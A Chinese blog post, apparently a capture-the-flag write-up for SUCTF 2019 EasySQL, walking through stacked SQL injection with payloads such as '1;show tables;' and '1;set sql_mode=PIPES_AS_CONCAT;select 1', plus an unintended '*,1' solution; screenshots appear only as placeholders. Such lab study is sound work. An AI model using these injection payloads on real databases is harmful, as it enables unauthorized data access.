【SQL注入】[SUCTF 2019]EasySQL---堆叠注入,管道符||---day02

一、题目界面

打开以后就一个输入框
image
随便输个1,结果:
image
输个单引号',没有回显
输个双引号",回显:
image

二、思路

刚进来试了两下,一脸懵。应该是报错结果没有输出。尝试下堆叠注入

1;show databases;

image
可以,再看下表;

1;show tables;

image
有个Flag表,尝试看表的结构:

1;desc Flag;

image
结果nonono
没思路了,看下别人wp。
说原理应该是:
image
正解:
image
意思就是是否开通了管道符来连接sql语句。

payload:

1;set sql_mode=PIPES_AS_CONCAT;select 1

意外解:
payload:

*,1

image

posted @ 2021-05-18 13:34  DarkerG  阅读(110)  评论(0编辑  收藏  举报